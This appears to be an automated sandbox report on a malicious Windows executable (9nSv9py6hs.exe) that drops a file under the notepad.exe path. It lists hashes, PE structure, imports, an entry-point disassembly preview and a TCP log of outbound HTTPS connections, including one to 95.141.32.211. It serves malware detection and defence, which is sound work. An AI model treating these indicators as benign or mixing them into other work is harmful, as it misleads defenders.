Download File

Process:	C:\Windows\System32\notepad.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1414144
Entropy (8bit):	7.916000775768196
Encrypted:	false
SSDEEP:	24576:3pMGNk8T1ifn+i9VLmxo6kLHnXOr1+PgVBCJPDCAEcw2ysp88WQMm:3/dimqVLmxkTnguhEcfysp88Ww
MD5:	358819C5567152065484C562A55074E4
SHA1:	49DE366DFA1217026DDC06B3B5EDA2D2664FCB87
SHA-256:	A58AAF48A55926929AD932C9C438851F212C1A6970F3DF39873EE1B6192CBE43
SHA-512:	A128179C912454F793441382D5307BB96B291E28985FC338FBC22FE22C848D55A539731A1F73900A57D1362585BA653F9429DCD58DFA56E0BEF5B5057AA3E02E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..R}...}...}.......\|...c...f...c.......Z=..z...}.......c...^...c...\|...c...\|...Rich}...........................PE..L...W.La.................V...........].......p....@.................................(........................................Z..P....0..`............................................................B..@............................................text....U.......V.................. ..`.data...H....p...`...Z..............@....rsrc...`....0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.964964584040434
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9nSv9py6hs.exe
File size:	2440192
MD5:	a41ba618482f08fb24090afee9ff771c
SHA1:	215ef2850f7e611d7f66168654e31be123fc36c8
SHA256:	ee2d96412de5f3c0d32099e70007ef01cc02362d9b3df261fb292fb2d3a2f516
SHA512:	5c58e41dbcdcc275c2123323903cc12b54987580027a3554413156409af2963b7e603298b253fade68e98fe582f66dc0c5126863d737f31387bb465d34b53d9b
SSDEEP:	49152:rG9psYYupbCzhp7bCAK+QaMY+n4hAo4Dx8ZwvJzshsq9oItSzBA0:rGXs/uGhNYbnvogxFsZ9oAM
TLSH:	35B5331266C6FD90E30B42350E79D6F0776DDA315C9A9A5633608E5EBF70270EA33706
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..R}...}...}.......\|...c...f...c.......Z=..z...}.......c...^...c...\|...c...\|...Rich}...........................PE..L......b...

File Icon


Icon Hash:	ba86ae8a819282a4

Static PE Info

General

Entrypoint:	0x405cee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6289E40D [Sun May 22 07:19:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9a0b230fe92ca04dbfff9730343347dc

Entrypoint Preview

Instruction
call 00007FB408A28D77h
jmp 00007FB408A23BBDh
int3
int3
int3
int3
int3
int3
int3
int3
mov edx, dword ptr [esp+0Ch]
mov ecx, dword ptr [esp+04h]
test edx, edx
je 00007FB408A23DABh
xor eax, eax
mov al, byte ptr [esp+08h]
test al, al
jne 00007FB408A23D58h
cmp edx, 00000100h
jc 00007FB408A23D50h
cmp dword ptr [02DAD5E0h], 00000000h
je 00007FB408A23D47h
jmp 00007FB408A28E2Bh
push edi
mov edi, ecx
cmp edx, 04h
jc 00007FB408A23D73h
neg ecx
and ecx, 03h
je 00007FB408A23D4Eh
sub edx, ecx
mov byte ptr [edi], al
add edi, 01h
sub ecx, 01h
jne 00007FB408A23D38h
mov ecx, eax
shl eax, 08h
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 03h
shr ecx, 02h
je 00007FB408A23D48h
rep stosd
test edx, edx
je 00007FB408A23D4Ch
mov byte ptr [edi], al
add edi, 01h
sub edx, 01h
jne 00007FB408A23D38h
mov eax, dword ptr [esp+08h]
pop edi
ret
mov eax, dword ptr [esp+04h]
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB408A23D4Ah
cmp edi, eax
jc 00007FB408A23EEAh
cmp ecx, 00000100h
jc 00007FB408A23D61h
cmp dword ptr [02DAD5E0h], 00000000h
je 00007FB408A23D58h
push edi
push esi
and edi, 0Fh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15a8c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29ae000	0xd5b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1210	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4270	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x154f6	0x15600	False	0.5329746893274854	OpenPGP Secret Key	6.38016259985965	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x17000	0x29965e8	0x230c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x29ae000	0xd5b0	0xd600	False	0.425069363317757	data	4.391082767348974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x29ae4e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Mexico
RT_ICON	0x29aeba8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x29af110	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x29b01b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x29b0660	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x29b0f08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x29b34b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x29b4588	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Mexico
RT_ICON	0x29b5430	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Mexico
RT_ICON	0x29b5cd8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Mexico
RT_ICON	0x29b63a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Mexico
RT_ICON	0x29b6908	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Spanish	Mexico
RT_ICON	0x29b8eb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Spanish	Mexico
RT_ICON	0x29b9f58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Spanish	Mexico
RT_ICON	0x29ba8e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Spanish	Mexico
RT_STRING	0x29bafa0	0xcc	data	Spanish	Mexico
RT_STRING	0x29bb070	0x2b4	data	Spanish	Mexico
RT_STRING	0x29bb328	0x284	data	Spanish	Mexico
RT_ACCELERATOR	0x29badc0	0x90	data	Spanish	Mexico
RT_GROUP_ICON	0x29b4558	0x30	data	Spanish	Mexico
RT_GROUP_ICON	0x29bad48	0x76	data	Spanish	Mexico
RT_GROUP_ICON	0x29b0620	0x3e	data	Spanish	Mexico
RT_VERSION	0x29bae50	0x150	data

Imports

DLL	Import
KERNEL32.dll	GetProcessPriorityBoost, GetConsoleAliasA, CreateFileA, GetSystemWindowsDirectoryA, GlobalUnlock, FindFirstVolumeMountPointW, CreateDirectoryExA, ZombifyActCtx, GetLogicalDriveStringsA, ReadConsoleInputA, GetComputerNameExW, GetTempPathA, GetCurrentDirectoryW, DebugBreak, LCMapStringW, GetProcAddress, GlobalAlloc, GetBinaryTypeA, IsDebuggerPresent, VerifyVersionInfoA, FindActCtxSectionStringW, UnhandledExceptionFilter, LocalFlags, CreateFileW, CreateNamedPipeW, GlobalFlags, GetModuleHandleA, CopyFileA, CreateActCtxW, lstrlenA, TlsAlloc, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, CreateMailslotW, WriteConsoleInputW, InterlockedExchangeAdd, EnumTimeFormatsW, VerifyVersionInfoW, FindNextFileW, FreeEnvironmentStringsW, GetTickCount, GetLastError, SetStdHandle, GetConsoleTitleA, GetNumberOfConsoleInputEvents, LoadLibraryW, LoadLibraryA, SetUnhandledExceptionFilter, DeleteFileA, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, HeapFree, GetModuleHandleW, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, RaiseException, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
USER32.dll	GetMessageExtraInfo, GetMenuInfo
GDI32.dll	GetBrushOrgEx, GetColorAdjustment, GetCharWidth32A

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 17, 2023 14:52:54.005238056 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:54.005302906 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:54.005373001 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:54.006269932 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:54.006303072 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:54.035579920 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:54.035615921 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.035686016 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:54.035991907 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:54.036017895 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.074414015 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:54.080948114 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:54.081021070 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:54.082422972 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:54.082535028 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:54.111226082 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.111609936 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:54.111661911 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.112185955 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.112263918 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:54.113472939 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:54.113554001 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.632050037 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.632128000 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.632366896 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.632652998 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.632695913 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.675873041 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.676006079 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.676031113 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.677323103 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.677422047 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.697355032 CET	49700	443	192.168.2.3	142.250.184.46
Jan 17, 2023 14:52:55.697382927 CET	443	49700	142.250.184.46	192.168.2.3
Jan 17, 2023 14:52:55.698240995 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:55.698278904 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.698431969 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:55.698442936 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.698503017 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.766489983 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.766794920 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:55.766848087 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.766887903 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:52:55.766961098 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:55.768901110 CET	49698	443	192.168.2.3	142.250.180.173
Jan 17, 2023 14:52:55.768934011 CET	443	49698	142.250.180.173	192.168.2.3
Jan 17, 2023 14:53:00.666340113 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:00.666387081 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:00.666503906 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:00.667072058 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:00.667095900 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:00.737050056 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:00.737502098 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:00.737550020 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:00.738821983 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:00.738915920 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.143693924 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.143724918 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.143908978 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.143915892 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.143981934 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.203661919 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.203701973 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.203727961 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.203727961 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.203763962 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.203789949 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.206108093 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:01.206296921 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.206374884 CET	49701	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:01.206394911 CET	443	49701	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.085021019 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.085091114 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.085197926 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.086232901 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.086262941 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.153788090 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.154314041 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.154381037 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.154927015 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.156027079 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.156065941 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.156184912 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.156748056 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.156816006 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.156908035 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.157074928 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.157098055 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.157815933 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.157850027 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.222762108 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.225403070 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.225464106 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.226025105 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.226864100 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.226906061 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.227005005 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.227035999 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.227051973 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.331605911 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.506968021 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.507042885 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.507199049 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.507512093 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.507529974 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.565628052 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.565849066 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.565959930 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.569154024 CET	49704	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.569197893 CET	443	49704	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.574425936 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.574922085 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.574960947 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.575428963 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.576095104 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.576127052 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.576291084 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.576303959 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.576796055 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.579469919 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.579536915 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.579639912 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.580022097 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.580040932 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.651348114 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.651675940 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.651715994 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.652482986 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.653480053 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.653512955 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.653664112 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.654141903 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.654165030 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.687803030 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.688024044 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.688118935 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.690140009 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.690181971 CET	443	49703	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.690206051 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.690234900 CET	49703	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.696119070 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.696168900 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.696270943 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.696610928 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.696635008 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.707640886 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.716408968 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.716473103 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.716531992 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.716559887 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.720176935 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.720249891 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.720455885 CET	49706	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.720485926 CET	443	49706	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.761718988 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.762101889 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.762128115 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.762737989 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.763381958 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.763401985 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.763499975 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.763650894 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.763662100 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.823757887 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.823812962 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.823875904 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.823935986 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.823975086 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.823995113 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:08.824023962 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.824064016 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.835709095 CET	49707	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:08.835742950 CET	443	49707	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.109985113 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.110136032 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.110241890 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.252722979 CET	49705	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.252768993 CET	443	49705	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.394474030 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.394562006 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.394680977 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.395437002 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.395469904 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.459573030 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.460093021 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.460122108 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.460689068 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.465615034 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.465666056 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.465862036 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.465879917 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.465892076 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.521471977 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.521559000 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.521653891 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:09.521749020 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.521790028 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.525532007 CET	49708	443	192.168.2.3	142.251.209.36
Jan 17, 2023 14:53:09.525569916 CET	443	49708	142.251.209.36	192.168.2.3
Jan 17, 2023 14:53:48.592528105 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.592576027 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.592657089 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.593282938 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.593302965 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.643893957 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.644299030 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.644336939 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.645739079 CET	443	49714	95.141.32.211	192.168.2.3
